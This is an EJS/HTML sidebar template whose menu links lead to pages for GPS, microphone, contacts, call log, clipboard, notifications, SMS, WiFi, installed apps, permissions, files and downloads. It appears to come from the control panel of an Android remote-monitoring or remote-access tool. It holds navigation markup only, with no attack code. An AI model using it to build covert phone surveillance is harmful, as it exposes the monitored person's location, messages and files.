<div class="four wide column">
    <div class="ui vertical pointing secondary fluid menu hoverEdit">
        <a href="<%= baseURL %>/info" class="item <% if (page==='info') { %> active <% } %>">
            <i class="icon info grey"></i> Info
        </a>
        <a href="<%= baseURL %>/gps" class="item <% if (page==='gps') { %> active <% } %>">
            <i class="icon map marker alternate grey"></i> GPS
        </a>
        <a href="<%= baseURL %>/microphone" class="item <% if (page==='microphone') { %> active <% } %>">
            <i class="icon microphone grey"></i> Microphone
        </a>
        <a href="<%= baseURL %>/contacts" class="item <% if (page==='contacts') { %> active <% } %>">
            <i class="icon address book grey"></i> Contacts
        </a>
        <a href="<%= baseURL %>/calls" class="item <% if (page==='calls') { %> active <% } %>">
            <i class="icon phone grey"></i> Call Log
        </a>
        <a href="<%= baseURL %>/clipboard" class="item <% if (page==='clipboard') { %> active <% } %>">
            <i class="icon clipboard grey"></i> Clipboard Log
        </a>
        <a href="<%= baseURL %>/notifications" class="item <% if (page==='notifications') { %> active <% } %>">
            <i class="icon exclamation grey"></i> Notification Log
        </a>
        <a href="<%= baseURL %>/sms" class="item <% if (page==='sms') { %> active <% } %>">
            <i class="icon comments grey"></i> SMS Manager
        </a>
        <a href="<%= baseURL %>/wifi" class="item <% if (page==='wifi') { %> active <% } %>">
            <i class="icon wifi grey"></i> WiFi Manager
        </a>
        <a href="<%= baseURL %>/apps" class="item <% if (page==='apps') { %> active <% } %>">
            <i class="icon google play grey"></i> Installed Apps
        </a>
        <a href="<%= baseURL %>/permissions" class="item <% if (page==='permissions') { %> active <% } %>">
            <i class="icon tasks grey"></i> Allowed Permissions
        </a>
        <a href="<%= baseURL %>/files" class="item <% if (page==='files') { %> active <% } %>">
            <i class="icon folder open grey"></i> File Explorer
        </a>
        <a href="<%= baseURL %>/downloads" class="item <% if (page==='downloads') { %> active <% } %>">
            <i class="icon download grey"></i> Downloads
        </a>

    </div>

</div>